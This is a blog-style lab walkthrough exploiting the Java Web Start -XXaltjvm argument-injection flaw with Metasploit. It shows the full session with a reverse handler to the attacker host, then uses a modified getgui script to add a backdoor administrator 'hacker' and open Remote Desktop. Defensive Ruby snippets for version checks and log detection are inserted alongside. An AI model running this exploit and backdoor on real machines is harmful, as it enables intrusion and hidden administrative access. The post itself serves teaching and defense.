Wednesday, May 12, 2010


Apache Java Web Start Metasploit + Remote Desktop Getgui

Metasploit: another lab. I think this is one of the most dangerous exploits compared to the ones shown previously, because what I tried was not detected by AV. The flaw lies in Java Web Start, the binary called javaws.exe: its URL validation is minimal, so arbitrary command-line arguments can be injected. The flaw was discovered in parallel by Tavis Ormandy and Ruben Santamarta.

"The command line switch -XXaltjvm and, interestingly, -J-XXaltjvm (see the javaws.exe switch -J). This tells Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil, so javaw.exe loads our evil jvm.dll. Adios ASLR, DEP...", Santamarta said in a statement.



A good write-up of the flaw can be found at this link.


To run this exploit from the Metasploit Framework we must be root on our machine and must not have any SMB server running; the other requirement is that the WebClient service must be running on the victim machine (WebClient is what lets Windows fetch a UNC path over WebDAV when SMB is not available, which is why we must not run an SMB server and why the MSF server listens on port 80). This is how to check whether the service is running:



Metasploit
To demonstrate the flaw we will use the popular Metasploit, with the exploit called java_ws_arginject_altjvm loaded. Below is the whole session; loading the exploit and the payload is as you saw in the previous posts on Metasploit :)


# msfconsole
msf exploit(java_ws_arginject_altjvm) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(java_ws_arginject_altjvm) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(java_ws_arginject_altjvm) > set LPORT 3333
LPORT => 3333
msf exploit(java_ws_arginject_altjvm) > exploit
[*] Started reverse handler on 192.168.56.1:3333
[*] Using URL: http://192.168.56.1:80/
[*] Server started.


Now all that remains is for the victim to browse to the server the MSF has started, which serves the malicious HTML page.
The virtual machine is an XP SP3 and the Java version is:

C:\Documents and Settings\victim 2> java -version
java version "1.6.0_18"
Java(TM) SE Runtime Environment (build 1.6.0_18-b07)
Java HotSpot(TM) Client VM (build 16.0-b13, mixed mode, sharing)

Updating Java to a later version is recommended, from 1.6.0_20 onward, which is where the patch is, because this vulnerability is considered of maximum criticality.
Of all the browser exploits I've tried so far, this is one of the most dangerous, since it is browser-independent, and so far AV (as noted, eh) has no signature for it, although that seems odd to me...
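Two checks a defender would want for the flaw described above, as an added example that is not code from the original post: parsing "java -version" output against 1.6.0_20 (the patched version the post names; treating anything older as exposed is this example's assumption), and spotting a -XXaltjvm / -J-XXaltjvm switch pointing at a UNC path in page content or proxy logs. The function names and the sample inputs are this example's own constructions.

```ruby
# Added example (not from the original post): two defender-side checks for the
# Java Web Start argument-injection flaw. Function names are this example's own;
# 1.6.0_20 is the patched version the post names; sample inputs are constructed.

FIXED_VERSION = [1, 6, 0, 20].freeze # 1.6.0_20, where the post says the patch is

# Constructed sample of "java -version" output, matching the lab's victim.
SAMPLE_JAVA_VERSION = <<~OUT
  java version "1.6.0_18"
  Java(TM) SE Runtime Environment (build 1.6.0_18-b07)
  Java HotSpot(TM) Client VM (build 16.0-b13, mixed mode, sharing)
OUT

# Constructed proxy-log style line carrying the injected switch (host is a
# documentation-range address). In single quotes '\\\\' is two backslashes.
SAMPLE_LOG = 'GET http://192.0.2.1/ 200 body: -J-XXaltjvm=\\\\192.0.2.10\\evil'

# Pulls the quoted version string, e.g. "1.6.0_18", out of java -version output.
def parse_java_version(output)
  m = output.match(/java version "([^"]+)"/)
  m && m[1]
end

# "1.6.0_18" -> [1, 6, 0, 18]; a missing update number counts as 0.
def version_tuple(ver)
  main, update = ver.split('_', 2)
  parts = main.split('.').map(&:to_i)
  parts += [0] * (3 - parts.size) if parts.size < 3
  parts[0, 3] + [update.to_i]
end

# True when the JRE predates the fix (arrays compare element-wise with <=>).
def vulnerable_to_altjvm?(ver)
  (version_tuple(ver) <=> FIXED_VERSION) < 0
end

# Returns the UNC path handed to -XXaltjvm (with or without the -J prefix) when
# +text+ contains one, else nil. Case-insensitive; accepts "=" or ":" and spaces.
def altjvm_argument(text)
  m = text.match(/(?:-J)?-XXaltjvm\s*[=:]\s*(\\\\[^\s"'<>]+)/i)
  m && m[1]
end

if $PROGRAM_NAME == __FILE__
  ver = parse_java_version(SAMPLE_JAVA_VERSION)
  puts "JRE #{ver}: #{vulnerable_to_altjvm?(ver) ? 'vulnerable, update to 1.6.0_20+' : 'patched'}"
  puts "altjvm path seen in log: #{altjvm_argument(SAMPLE_LOG).inspect}"
end
```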



REMOTE DESKTOP


When we get a meterpreter session we have many features, such as migrating processes, keylogger, screenshot, capturing keys, etc.
The option we will look at is a script that enables Terminal Server on the victim machine, but to use it without problems we will have to modify the code so that it places a user in the Administrators group on an English-language Windows. The script is called GETGUI.
To modify it we go to the scripts directory, in my case:
/opt/metasploit3/msf3/scripts/meterpreter

The meterpreter scripts live on this path.
As you can see, getgui gives us some options, one of which is the language, passed with -l, but only English (en_EN) and German (de_DE) are supported.



meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or:    getgui -e

OPTIONS:

    -e  Enable RDP only.
    -f  Forward RDP Connection.
    -h  Help menu.
    -l  The language switch
        Possible Options 'de_DE', 'en_EN' / default is: 'en_EN'
    -p  The password of the user to add.
    -u  The Username of the user to add.






What we do is edit the file getgui.rb:

# nano /opt/metasploit3/msf3/scripts/meterpreter/getgui.rb

We go to line 113 and change this piece of code:

# local group names for the net localgroup calls further down the script
case lang
when "en_EN"
  rdu = "Remote Desktop Users"
  admin = "Administrators"
when "de_DE"
  rdu = "Remotedesktopbenutzer"
  admin = "Administrator"
end

for this one, which adds the en_US language of an English Windows:

# local group names for the net localgroup calls further down the script
case lang
when "en_EN"
  rdu = "Remote Desktop Users"
  admin = "Administrators"
when "de_DE"
  rdu = "Remotedesktopbenutzer"
  admin = "Administrator"
when "en_US"
  rdu = "Remote Desktop Users"
  admin = "Administrators"
end
Once we have changed it, we go back to our meterpreter session and run it.


meterpreter > run getgui -u hacker -p 123456 -l es_ES
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Language set by user to: 'es_ES'
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: hacker with Password: 123456
[*] Adding User: hacker to local group 'Remote Desktop Users'
[*] Adding User: hacker to local group 'Administrators'
[*] You CAN now login with the user created


 

What this does is create a user hacker with password 123456 in the "Administrators" group, which can log in through Remote Desktop thanks to the "Remote Desktop Users" group.
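The trail this leaves on the victim is what a defender hunts for. As an added example that is not part of the original post, the Ruby below flags, from constructed Security-log records, an account that was created and within minutes added to both an Administrators and a Remote Desktop Users group, which is exactly the sequence printed above; the event IDs are the standard Windows ones and the function name is this example's own.

```ruby
# Added example (not part of the original post): spot the account trail getgui
# leaves in the Windows Security log. Event IDs are the standard ones (XP: 624
# user created, 636 member added to a local group; Vista and later: 4720, 4732).
# The records are constructed and simplified to name/group fields; real 636/4732
# events carry the member as a SID, so resolve it first in production.
require 'time'

CREATED_IDS   = [624, 4720].freeze
GROUP_ADD_IDS = [636, 4732].freeze
RDP_GROUPS    = ['Remote Desktop Users', 'Remotedesktopbenutzer'].freeze
ADMIN_GROUPS  = ['Administrators', 'Administratoren', 'Administrator'].freeze

SAMPLE_EVENTS = [
  { time: '2010-05-12T10:00:00Z', id: 624, account: 'hacker' },
  { time: '2010-05-12T10:00:02Z', id: 636, account: 'hacker', group: 'Remote Desktop Users' },
  { time: '2010-05-12T10:00:03Z', id: 636, account: 'hacker', group: 'Administrators' },
  { time: '2010-05-12T11:30:00Z', id: 624, account: 'intern' },
  { time: '2010-05-13T09:00:00Z', id: 636, account: 'intern', group: 'Remote Desktop Users' }
].freeze

# Returns the accounts that were created and, within +window+ seconds, added to
# both an admin group and an RDP group: the footprint of "run getgui -u -p".
def getgui_footprint(events, window: 300)
  created = {}
  groups  = Hash.new { |h, k| h[k] = [] }
  events.each do |e|
    t = Time.iso8601(e[:time])
    if CREATED_IDS.include?(e[:id])
      created[e[:account]] = t
    elsif GROUP_ADD_IDS.include?(e[:id])
      groups[e[:account]] << [t, e[:group]]
    end
  end
  created.select do |acct, t0|
    adds = groups[acct].select { |t, _| t >= t0 && t - t0 <= window }.map(&:last)
    adds.any? { |g| ADMIN_GROUPS.include?(g) } && adds.any? { |g| RDP_GROUPS.include?(g) }
  end.keys
end

puts "getgui-like accounts: #{getgui_footprint(SAMPLE_EVENTS).inspect}" if $PROGRAM_NAME == __FILE__
```

The same records would also show the RDP enablement itself (the registry and Terminal Services changes the script reports), which makes a good second signal to correlate with.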
Now, to see whether it works, go to a shell and connect with the rdesktop program (if you don't have it, on distros like Debian: aptitude install rdesktop).

$ rdesktop 192.168.56.101

That's all, greetings.
REFERENCES

http://blog.metasploit.com/2010/04/java-web-start-argument-injection.html
http://seclists.org/fulldisclosure/2010/Apr/119
http://www.pentester.es/2010/05/explotando-java-web-start.html
http://www.pentester.es/2010/05/vulnerabilidad-en-java-web-start.html
http://threatpost.com/es_la/blogs/nueva-failure-in-java-affects-all-the-versions-of-windows-040910
